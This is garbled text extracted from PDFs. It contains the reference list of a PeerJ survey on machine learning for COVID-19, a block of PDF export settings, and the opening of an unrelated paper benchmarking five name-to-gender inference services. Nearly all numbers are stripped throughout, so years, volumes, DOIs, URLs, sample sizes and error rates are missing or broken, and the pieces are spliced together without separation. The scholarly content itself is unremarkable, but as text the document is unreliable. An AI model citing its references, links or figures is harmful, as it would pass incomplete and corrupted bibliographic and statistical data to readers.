ardakani aa, kanafi ar, acharya ur, khadem n, mohammadi a. . application of deep learning technique to manage covid-19 in routine clinical practice using ct images: results of
qualitative and fuzzy reasoning for identifying non-linear physiological systems: an application to intracellular thiamine kinetics. in: th international workshop on intelligent data analysis in medicine and pharmacology. bernheim a, mei x, huang m, yang y, fayad za, zhang n, diao k, lin b, zhu x, li k, li s, shan h, jacobi a, chung m. . chest ct findings in coronavirus disease- (covid- ): relationship to duration of infection. radiology ( ): doi . /radiol. . butt c, gill j, chun d, babu ba. . deep learning system to screen coronavirus disease pneumonia. applied intelligence epub ahead of print april doi . /s - - - . casey b. . how good is radiography for covid- detection? available at auntminnie.com. chahrour m, assi s, bejjani m, nasrallah aa, salhab h, fares m, khachfe hh. . a bibliometric analysis of covid- research activity: a call for increased output. cureus ( ):e . chimmula vkr, zhang l. . time series forecasting of covid- transmission in canada using lstm networks. chaos, solitons & fractals : . corman vm, landt o, kaiser m, molenkamp r, meijer a, chu dk, bleicker t, brünink s, schneider j, schmidt ml, mulders dg, haagmans bl, van der veer b, van den brink s, wijsman l, goderski g, romette j-l, ellis j, zambon m, peiris m, goossens h, reusken c, koopmans mp, drosten c. . detection of novel coronavirus ( -ncov) by real-time rt-pcr. euro surveillance ( ): . dananjayan s, raj gm. . artificial intelligence during a pandemic: the covid- example. international journal of health planning and management ( ): – doi . /hpm. . das km, lee ey, singh r, enani ma, al dossari k, van gorkom k, larsson sg, langer rd. . follow-up chest radiographic findings in patients with mers-cov after recovery. indian journal of radiology and imaging ( ): doi . /ijri.ijri_ _ . deng l. . a tutorial survey of architectures, algorithms, and applications for deep learning. apsipa transactions on signal and information processing : – . dong d, tang z, wang s, hui h, gong l, lu y, xue z, liao h, chen f, yang f, jin r, wang k, liu z, wei j, mu w, zhang h, jiang j, tian j, li h. . the role of imaging in the detection chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.dib. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - auntminnie.com http://dx.doi.org/ . /hpm. http://dx.doi.org/ . /ijri.ijri_ _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and management of covid- : a review. ieee reviews in biomedical engineering epub ahead of print april doi . /rbme. . . duan yn, qin j. . pre-and posttreatment chest ct findings: novel coronavirus ( -ncov) pneumonia. radiology ( ): doi . /radiol. . elavarasan rm, pugazhendhi r. . restructured society and environment: a review on potential technological strategies to control the covid- pandemic. science of the total environment : doi . /j.scitotenv. . . fang y, zhang h, xie j, lin m, ying l, pang p, ji w. . sensitivity of chest ct for covid- : comparison to rt-pcr. radiology ( ):e –e doi . /radiol. . farhat h, sakr ge, kilany r. . deep learning applications in pulmonary medical imaging: recent updates and insights on covid- . machine vision and applications ( ): – doi . /s - - - . fong sj, li g, dey n, crespo rg, herrera-viedma e. . composite monte carlo decision making under high uncertainty of novel coronavirus epidemic using hybridized deep learning and fuzzy rule induction. applied soft computing : . 
gonzalez-dias p, lee ek, sorgi s, de lima ds, urbanski ah, silveira el, nakaya hi. . methods for predicting vaccine immunogenicity and reactogenicity. human vaccines & immunotherapeutics ( ): – doi . / . . . gorbalenya ae. . severe acute respiratory syndrome-related coronavirus: the species and its viruses, a statement of the coronavirus study group. biorxiv doi . / . . . . greff k, srivastava rk, koutn j, steunebrink br, schmidhuber j. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems ( ): – doi . /tnnls. . . guan wj, ni zy, hu y, liang wh, ou cq, he jx, liu l, shan h, lie l, hui dsc, du b, li l, zeng g, yuen ky, chen rc, tang cl, wang t, chen py, xiang j, li sy, wang jl, liang zl, peng yx, wei l, liu y, hu y, peng p, wang jm, liu jy, chen z, li g, zheng zj, qui sq, luo j, ye cy, zhu sy, zhong ns. . clinical characteristics of coronavirus disease in china. new england journal of medicine ( ): – doi . /nejmoa . haque iri, neubert j. . deep learning approaches to biomedical image segmentation. informatics in medicine unlocked : doi . /j.imu. . . holshue ml, debolt c, lindquist s, lofy kh, wiesman j, bruce h, spitters c, ericson k, wilkerson s, tural a, diaz g, cohn a, fox la, patel a, gerber si, kim l, tong s, lu x, lindstrom s, pallansch ma, weldon wc, biggs hm, uyeki tm, pillai sk. . first case of novel coronavirus in the united states. new england journal of medicine ( ): – doi . /nejmoa . hossain mm. . current status of global research on novel coronavirus disease (covid- ): a bibliometric analysis and knowledge mapping. f research : doi . /f research. . . hu s, gao y, niu z, jiang y, li l, xiao x, wang m, fang ef, menpes-smith w, xia j, ye h, yang g. . weakly supervised deep learning for covid- infection detection and classification from ct images. ieee access : – doi . /access. . . huang c, wang y, li x, ren l, zhao j, hu y, zhang l, fan g, xu j, gu x, cheng z, yu t, xia j, wei y, wu w, xie x, yin w, li h, liu m, xiao y, gao h, guo l, xie j, wang g, jiang r, gao z, jin q, wang j, cao b. a. clinical features of patients infected with novel coronavirus in wuhan, china. lancet ( ): – doi . /s - ( ) - . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /rbme. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /j.scitotenv. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /tnnls. . http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /j.imu. . http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huang l, han r, ai t, yu p, kang h, tao q, xia l. b. serial quantitative chest ct assessment of covid- : deep-learning approach. radiology: cardiothoracic imaging ( ):e doi . /ryct. . hui ds, azhar ei, madani ta, ntoumi f, kock r, dar o, ippolito g, mchugh td, memish za, drosten c, zumla a, petersen e. . the continuing -ncov epidemic threat of novel coronaviruses to global health: the latest novel coronavirus outbreak in wuhan, china. international journal of infectious diseases : – doi . /j.ijid. . . . hurt b, kligerman s, hsiao a. . deep learning localization of pneumonia: coronavirus (covid- ) outbreak. journal of thoracic imaging ( ):w –w doi . /rti. . imai n, dorigatti i, cori a, donnelly c, riley s, ferguson n. . 
report : estimating the potential total number of novel coronavirus cases in wuhan city, china. imperial college london epub ahead of print january doi . / . inui s, fujikawa a, jitsu m, kunishima n, watanabe s, suzuki y, umeda s, uwabe y. . chest ct findings in cases from the cruise ship “diamond princess” with coronavirus disease (covid- ). radiology: cardiothoracic imaging ( ):e doi . /ryct. . jaiswal a, gianchandani n, singh d, kumar v, kaur m. . classification of the covid- infected patients using densenet based deep transfer learning. journal of biomolecular structure and dynamics epub ahead of print july doi . / . . . jiang x, coffee m, bari a, wang j, jiang x, shi j, dai j, cai j, zhang t, wu z, he g, huang y. . towards an artificial intelligence framework for data-driven prediction of coronavirus clinical severity. computers, materials & continua ( ): – doi . /cmc. . . karim f, majumdar s, darabi h, chen s. . lstm fully convolutional networks for time series classification. ieee access : – doi . /access. . . ke yy, peng tt, yeh tk, huang wz, chang se, wu sh, hung hc, hsu ta, lee sj, song js, lin wh, chiang tj, lin jh, sytwu hk, chen ct. . artificial intelligence approach fighting covid- with repurposing drugs. biomedical journal ( ): – doi . /j.bj. . . . klein sl, jedlicka a, pekosz a. . the xs and y of immune responses to viral vaccines. lancet infectious diseases ( ): – doi . /s - ( ) - . kooraki s, hosseiny m, myers l, gholamrezanezhad a. . coronavirus (covid- ) outbreak: what the department of radiology should know. journal of the american college of radiology ( ): – doi . /j.jacr. . . . kumar a, gupta pk, srivastava a. . a review of modern technologies for tackling covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – doi . /j.dsx. . . . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . li d, wang d, dong j, wang n, huang h, xu h, xia c. a. false-negative results of real-time reverse-transcriptase polymerase chain reaction for severe acute respiratory syndrome coronavirus : role of deep-learning-based ct diagnosis and insights from two cases. korean journal of radiology ( ): – doi . /kjr. . . li l, qin l, xu z, yin y, wang x, kong b, bai j, lu y, fang z, song q, cao k, liu d, wang g, xu q, fang x, zhang s, xia j, xia j. b. artificial intelligence distinguishes covid- from community acquired pneumonia on chest ct. radiology ( ): . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . /j.ijid. . . http://dx.doi.org/ . /rti. http://dx.doi.org/ . / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . / . . http://dx.doi.org/ . /cmc. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.bj. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jacr. . . http://dx.doi.org/ . /j.dsx. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /kjr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li z, zhong z, li y, zhang t, gao l, jin d, sun y, ye x, yu l, hu z, xiao j, huang l, tang y. c. from community acquired pneumonia to covid- : a deep learning based method for quantitative analysis of covid- on thick-section ct scans. european radiology ( ): – doi . /s - - -x. liu f, zhang q, huang c, shi c, wang l, shi n, fang c, shan f, mei x, shi j, song f, yang z, ding z, su x, lu h, zhu t, zhang z, shi l, shi j. a. ct quantification of pneumonia lesions in early days predicts progression to severe illness in a cohort of covid- patients. 
theranostics ( ): – doi . /thno. . liu g, xu yan, he z, rao y, xia j, fan l. . deep learning-based channel prediction for edge computing networks toward intelligent connected vehicles. ieee access : – doi . /access. . . liu z, huang s, lu w, su z, yin x, liang h, zhang h. b. modeling the trend of coronavirus disease and restoration of operational capability of metropolitan medical service in china: a machine learning and mathematical model-based analysis. global health research and policy ( ): – doi . /s - - - . livingstone dj. . artificial neural networks: methods and applications. totowa: humana press. loey m, smarandache f, khalifa nem. . within the lack of chest covid- x-ray dataset: a novel detection model based on gan and deep transfer learning. symmetry ( ): doi . /sym . lou j, tian sj, niu sm, kang xq, lian hx, zhang lx, zhang jj. . coronavirus disease : a bibliometric analysis and review. european review for medical and pharmacological sciences ( ): – . mei x, lee hc, diao ky, huang m, lin b, liu c, xie z, ma y, robson pm, chung m, bernheim a, mani v, calcagno c, li k, li s, shan h, lv j, zhao t, xia j, long q, steinberger s, jacobi a, deyer t, luksza m, liu f, little bp, fayad za, yang y. . artificial intelligence-enabled rapid diagnosis of patients with covid- . nature medicine : – . mohammadi m, al-fuqaha a, sorour s, guizani m. . deep learning for iot big data and streaming analytics: a survey. ieee communications surveys & tutorials ( ): – doi . /comst. . . oh y, park s, ye jc. . deep learning covid- features on cxr using limited training data sets. ieee transactions on medical imaging ( ): – doi . /tmi. . . ozturk t, talo m, yildirim ea, baloglu ub, yildirim o, acharya ur. . automated detection of covid- cases using deep neural networks with x-ray images. computers in biology and medicine : doi . /j.compbiomed. . . pan f, ye t, sun p, gui s, liang b, li l, zheng d, wang j, hesketh rl, yang l, zheng c. . time course of lung changes on chest ct during recovery from novel coronavirus (covid- ) pneumonia. radiology : . park y, casey d, joshi i, zhu j, cheng f. . emergence of new disease-how can artificial intelligence help? trends in molecular medicine ( ): – doi . /j.molmed. . . . patel a, jernigan db, -ncov cdc response team. . initial public health response and interim clinical guidance for the novel coronavirus outbreak—united states, december , –february , . morbidity and mortality weekly report ( ): – doi . /mmwr.mm e . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /thno. http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sym http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.molmed. . . http://dx.doi.org/ . /mmwr.mm e http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ peng qy, wang xt, zhang ln, chinese critical care ultrasound study group. . findings of lung ultrasonography of novel corona virus pneumonia during the – epidemic. intensive care medicine ( ): – doi . /s - - - . pirouz b, shaffiee haghshenas s, shaffiee haghshenas s, piro p. . investigating a serious challenge in the sustainable development process: analysis of confirmed cases of covid- (new type of coronavirus) through a binary classification using artificial intelligence and regression analysis. sustainability ( ): . pouyanfar s, sadiq s, yan y, tian h, tao y, reyes mp, shyu m, chen s, iyengar ss. . 
a survey on deep learning: algorithms, techniques, and applications. acm computing surveys ( ): – doi . / . qiang xl, xu p, fang g, liu wb, kou z. . using the spike protein feature to predict infection risk and monitor the evolutionary dynamic of coronavirus. infectious diseases of poverty ( ): – doi . /s - - - . rahaman mm, li c, yao y, kulwa f, rahman ma, wang q, qi s, kong f, zhu x, zhao x. . identification of covid- samples from chest x-ray images using deep learning: a comparison of transfer learning approaches. journal of x-ray science and technology ( ): – . randhawa gs, soltysiak mp, el roz h, de souza cp, hill ka, kari l. . machine learning using intrinsic genomic signatures for rapid classification of novel pathogens: covid- case study. plos one ( ):e doi . /journal.pone. . rao ass, vazquez ja. . identification of covid- can be quicker through artificial intelligence framework using a mobile phone–based survey when cities and towns are under quarantine. infection control & hospital epidemiology epub ahead of print march doi . /ice. . . read jm, bridgen jr, cummings da, ho a, jewell cp. . novel coronavirus -ncov: early estimation of epidemiological parameters and epidemic predictions. medrxiv doi . / . . . . ribeiro mhdm, da silva rg, mariani vc, dos santos coelho l. . short-term forecasting covid- cumulative confirmed cases: perspectives for brazil. chaos, solitons & fractals : doi . /j.chaos. . . rodrigues jcl, hare ss, devaraj a, jacob j, johnstone a, mcstay r, nair a, robinson g. . an update on covid- for the radiologist-a british society of thoracic imaging statement. clinical radiology ( ): – . rodriguez-morales aj, cardona-ospina ja, gutiérrez-ocampo e, villamizar-peña r, holguin-rivera y, escalera-antezana jp, alvarado-arnez le, bonilla-aldana dk, franco-paredes c, henao-martinez af, paniz-mondolfi a, lagos-grisales gj, ramírez-vallejo e, suárez ja, zambrano li, villamil-gómez we, balbin-ramon gj, rabaan aa, harapan h, dhama k, nishiura h, kataoka h, ahmad t, latin american network of coronavirus disease -covid- research (lancovid- ). . clinical, laboratory and imaging features of covid- : a systematic review and meta-analysis. travel medicine and infectious disease : doi . /j.tmaid. . . sak h, senior a, beaufays f. . long short-term memory recurrent neural network architectures for large scale acoustic modeling has. in: fifteenth annual conference of the international speech communication association. salman fm, abu-naser ss, alajrami e, abu-nasser bs, alashqar ba. . covid- detection using artificial intelligence. international journal of academic engineering research (ijaer) ( ): – . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ice. . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /j.chaos. . http://dx.doi.org/ . /j.tmaid. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ santosh kc. . ai-driven tools for coronavirus outbreak: need of active learning and cross-population train/test models on multitudinal/multimodal data. journal of medical systems ( ): – doi . /s - - -x. shi f, wang j, shi j, wu z, wang q, tang z, he k, shi y, shen d. . review of artificial intelligence techniques in imaging data acquisition, segmentation and diagnosis for covid- . ieee reviews in biomedical engineering epub ahead of print april doi . /rbme. . . singh d, kumar v, kaur m. . 
classification of covid- patients from chest ct images using multi-objective differential evolution-based convolutional neural networks. european journal of clinical microbiology & infectious diseases epub ahead of print april doi /s - - -z. singh d, kumar v, yadav v, kaur m. . deep convolutional neural networks based classification model for covid- infected patients using chest x-ray images. international journal of pattern recognition and artificial intelligence : doi . /s . stewart ka, navarro sm, kambala s, tan g, poondla r, lederman s, barbour k, lavy c. . trends in ultrasound use in low and middle income countries: a systematic review. international journal of maternal and child health and aids ( ): . tiwari s, kumar s, guleria k. . outbreak trends of coronavirus disease– in india: a prediction. disaster medicine and public health preparedness epub ahead of print april doi . /dmp. . . toğaçar m, ergen b, cömert z. . covid- detection using deep learning models to exploit social mimic optimization and structured chest x-ray images using fuzzy color and stacking approaches. computers in biology and medicine : doi . /j.compbiomed. . . tuli s, tuli s, tuli r, gill ss. . predicting the growth and trend of covid- pandemic using machine learning and cloud computing. internet of things : doi . /j.iot. . . tummers j, catal c, tobi h, tekinerdogan b, leusink g. . coronaviruses and people with intellectual disability: an exploratory data analysis. journal of intellectual disability research ( ): – doi . /jir. . ucar f, korkmaz d. . covidiagnosis-net: deep bayes-squeezenet based diagnostic of the coronavirus disease (covid- ) from x-ray images. medical hypotheses : doi . /j.mehy. . . vaid s, cakan c, bhandari m. . using machine learning to estimate unobserved covid- infections in north america. journal of bone and joint surgery epub ahead of print may doi /jbjs. . . vaishya r, javaid m, khan ih, haleem a. . artificial intelligence (ai) applications for covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – doi . /j.dsx. . . . wang w, xu y, gao r, lu r, han k, wu g, tan w. a. detection of sars-cov- in different types of clinical specimens. jama ( ): – doi . /jama. . . wang y, dong c, hu y, li c, ren q, zhang x, shi h, zhou m. b. temporal changes of ct findings in patients with covid- pneumonia: a longitudinal study. radiology : doi . /radiol. . weidt f, silva r. . systematic literature review in computer science-a practical guide. relatórios técnicos do dcc/ufjf doi . /rg. . . . . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /rbme. . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s http://dx.doi.org/ . /dmp. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.iot. . http://dx.doi.org/ . /jir. http://dx.doi.org/ . /j.mehy. . http://dx.doi.org/ . /jbjs. . http://dx.doi.org/ . /j.dsx. . . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wen z, chi y, zhang l, liu h, du k, li z, chen j, cheng l, wang d. . coronavirus disease : initial detection on chest ct in a retrospective multicenter study of chinese subjects. radiology: cardiothoracic imaging ( ):e doi . /ryct. . wong hyf, lam hys, fong aht, leung st, chin twy, lo csy, lui mm-s, lee jcy, chiu kw-h, chung tw-h, lee eyp, wan eyf, hung ifn, lam tpw, kuo md, ng m-y. . 
frequency and distribution of chest radiographic findings in covid- positive patients. radiology ( ):e –e doi . /radiol. . world health organization. . novel coronavirus ( -ncov): situation report, . geneva: who. available at https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation- report- - -january- . wu x, hui h, niu m, li l, wang l, he b, yang x, li l, li h, tian j, zha y. . deep learning-based multi-view fusion model for screening novel coronavirus pneumonia: a multicentre study. european journal of radiology : doi . /j.ejrad. . . wynants l, van calster b, collins gs, riley rd, heinze g, schuit e, bonten mmj, debray tpa, de vos m, dhiman p, haller mc, henckaerts l, kreuzberger n, luijken lohman a, ma k, andaur j, reitsma cl, sergeant jb, skoetz jc, snel c, smits n, snell kie, sperrin m, steyerberg ew, takada t, van kuijk smj, van royen fs, wallisch c, hooft l, moons kgm, van smeden m. . prediction models for diagnosis and prognosis of covid- infection: systematic review and critical appraisal. bmj :m doi . /bmj.m . xie x, zhong z, zhao w, zheng c, wang f, liu j. . chest ct for typical -ncov pneumonia: relationship to negative rt-pcr testing. radiology ( ):e –e doi . /radiol. . xu x, yu c, qu j, zhang l, jiang s, huang d, chen b, zhang z, guan w, ling z, jiang r, hu t, ding y, lin l, gan q, luo l, tang x, liu j. . imaging and clinical features of patients with novel coronavirus sars-cov- . european journal of nuclear medicine and molecular imaging - ( ): – doi . /s - - - . yang s, jiang l, cao z, wang l, cao j, feng r, zhang z, xue x, shi y, shan f. a. deep learning for detecting corona virus disease (covid- ) on high-resolution computed tomography: a pilot study. annals of translational medicine ( ): doi . /atm. . . . yang z, zeng z, wang k, wong ss, liang w, zanin m, liu p, cao x, gao z, mai z, liang j, liu x, li s, li y, ye f, guan w, yang y, li f, luo s, xie y, liu b, wang z, zhang s, wang y, zhong n, he j. b. modified seir and ai prediction of the epidemics trend of covid- in china under public health interventions. journal of thoracic disease ( ): – doi . /jtd. . . . yuen ks, ye zw, fung sy, chan cp, jin dy. . sars-cov- and covid- : the most important research questions. cell & bioscience ( ): – doi . /s - - - . zhao r, yan r, chen z, mao k, wang p, gao rx. . deep learning and its applications to machine health monitoring. mechanical systems and signal processing : – doi . /j.ymssp. . . . zhao z, chen w, wu x, chen pcy, liu j. . lstm network : a deep learning approach for short-term traffic forecast. iet intelligent transport systems ( ): – . zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ):e –e doi . /radiol. . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . /radiol. https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation-report- - -january- https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation-report- - -january- http://dx.doi.org/ . /j.ejrad. . http://dx.doi.org/ . /bmj.m http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /atm. . . http://dx.doi.org/ . /jtd. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ymssp. . . http://dx.doi.org/ . /radiol. https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. 
early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks introduction methodology theoretical background of machine learning algorithms covid- machine learning adoption-oriented perspective covid- datasets survey and bibliometric analysis challenges and future research opportunities conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
submitted february accepted june published july corresponding author lucía santamaría, lucia.santamaria@ymail.com academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs.
copyright santamaría and mihaljević distributed under creative commons cc-by . open access comparison and benchmark of name-to- gender inference services lucía santamaría ,* and helena mihaljević ,* amazon development center, berlin, germany university of applied sciences, berlin, germany * these authors contributed equally to this work. abstract the increased interest in analyzing and explaining gender inequalities in tech, media, and academia highlights the need for accurate inference methods to predict a person’s gender from their name. several such services exist that provide access to large databases of names, often enriched with information from social media profiles, culture-specific rules, and insights from sociolinguistics. we compare and benchmark five name- to-gender inference services by applying them to the classification of a test data set consisting of , manually labeled names. the compiled names are analyzed and characterized according to their geographical and cultural origin. we define a series of performance metrics to quantify various types of classification errors, and define a parameter tuning procedure to search for optimal values of the services’ free parameters. finally, we perform benchmarks of all services under study regarding several scenarios where a particular metric is to be optimized. subjects data mining and machine learning, data science, databases, digital libraries keywords name-based gender inference, classification algorithms, performance evaluation, gender analysis, scientometrics, bibliometrics introduction quantitative measurements and large-scale analyses of social phenomena in relation to gender are gaining significance as tools to uncover areas of gender bias and inequality, and to ultimately foster women’s inclusion and advancement. algorithms that can infer the gender category from other features have thereby opened up new opportunities to enhance data previously lacking such information. examples include social media profiles, github contributors, and authors of scientific publications, the analysis of which regarding gender has led to a better understanding of women’s situation in domains such as tech (vasilescu, serebrenik & filkov, ), media (matias, szalavitz & zuckerman, ; macharia et al., ), and academic publishing (larivière et al., a; west et al., ; mihaljević-brandt, santamaría & tullney, ; bonham & stefan, b). particularly in the latter case of bibliometric studies, the most reliable piece of information available for guessing a gender is the name string of the author. the standard approach for name-to-gender inference is based upon querying large (and often openly available) name repositories, such as censuses, administration records, and universal or country-specific birth lists. occasionally, results are refined with name-forming rules for specific cultures or ethnicities. in the attempt to identify the gender of as many names as how to cite this article santamaría and mihaljević ( ), comparison and benchmark of name-to-gender inference services. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:lucia.santamaria@ymail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. possible, often a multi-step combination of database queries, insights from sociolinguistics, and manual corrections is performed. 
this leads to non-transparent processes for gender inference that might be troublesome to reproduce and almost impossible to test, compare, and transfer. recently, the plethora of self-labeled data arising from social media has been successfully leveraged to improve the accuracy and specificity of methods based on querying compiled lists of names. this input has given rise to a handful of free and paid web services that infer gender from name strings. they usually gather data from manifold sources and profit from a greater degree of diversity, notably in regard to the origin of names, thus becoming a good choice for analyses outside of a national context. access to such services is typically granted through apis, turning gender inference on large corpora into a fast, reliable, and cost-effective process. using them in large-scale analyses is tempting due to their accuracy and availability; nonetheless, some caveats may apply, as the underlying data sources are frequently closed and thus not necessarily reliable nor verifiable. it is perhaps no surprise that, with few exceptions, the majority of research that uses name-based gender assignment does not evaluate the chosen method nor justifies the decision to use particular data sources and inference methodologies. furthermore, only a handful of studies have attempted to compare different approaches and provide solid groundwork for the choice of a given tool. we intend to fill this gap by presenting a comprehensive benchmark and comparison of several available gender inference services applied to the identification of names stemming from the academic publishing community. we evaluate web services gender api, genderize.io, nameapi, namsor and python package gender-guesser, five popular and commonly used methods for the problem at hand. all services are able to handle an international set of names and are thus singularly valuable for bibliographic analyses. after describing the services broken down by several decision-critical properties, such as data sources, accessibility, and cost, we test each of them on a manually labeled data set consisting of , names, which we make publicly available to interested researchers working on this topic (mihaljević & santamaría, ). several metrics of relevance for the classification problem are defined, distinguishing between misclassifications, i.e., assignments of the wrong gender to a name, and cases for which it is not possible to predict a gender, denominated non-classifications. to optimize for the metrics we perform repeated, cross-validated, randomized searches over the free parameters of the services. for gender api, genderize.io, and namsor we report error rates under % for inaccuracies including non-classifications, under the constraint that the misclassification error amounts to a maximum of %. the three services also achieve less than % error for misclassifications when imposing that at least % of all names be assigned a gender. gender api is in general the best performer in our benchmarks, followed by namsor. the cultural context of a name is known to have an impact on gender inference; to assess its importance we have used namsor’s origin api to predict the most likely origin of the names and split our analysis with respect to this facet. as expected, the less confident predictions occur for names of asian origin. we quantify the effect of the names’ santamaría and mihaljević ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
provenience on the results of the surveyed gender assignment services; overall, gender api outperforms all others for asian names as well. to the best of our knowledge, this is the most comprehensive comparison of gender assignment algorithms for the field of bibliometric analyses performed to date. the results of our analysis are meant to be the basis for further claims of gender assignment accuracy in future studies on the topic. related work bibliometric studies based on systematic assignment of gender with the purpose of analyzing specific aspects of the academic landscape have been conducted for at least a decade. mozaffarian & jamali ( ) studied the productivity of iranian women in science by analyzing over , publications by iranian authors from , taken from wos. gender inference was done manually, resorting to an internal list of iranian academics and to internet searches. while not scalable, this approach showed that a high degree of familiarity with names from a particular country greatly aids the gender inference task. the article reported lower productivity of iranian female authors with respect to their male counterparts. with a much broader scope, frietsch et al. ( ) considered patent applications from european countries between and and publications in eight scientific areas from to , extracted from scopus. comprehensive and country-specific lists of names collected, post-processed, and tested by naldi et al. ( ) were applied to assign a gender to inventors and authors. the analyzed data set comprised almost , , inventors and , authors from over , publications, after rejecting over % of names that could not be assigned a definite gender. findings included stark national differences in female contributions, with central european countries being the most prone to exhibit a wide gender gap. recently, various studies have focused on large-scale, scalable bibliometric analyses of academic publications in relation to gender. west et al. ( ) analyzed over , , publications from jstor, a digital library corpus in science and humanities. they could assign a gender to % of authors with full first names by using data from 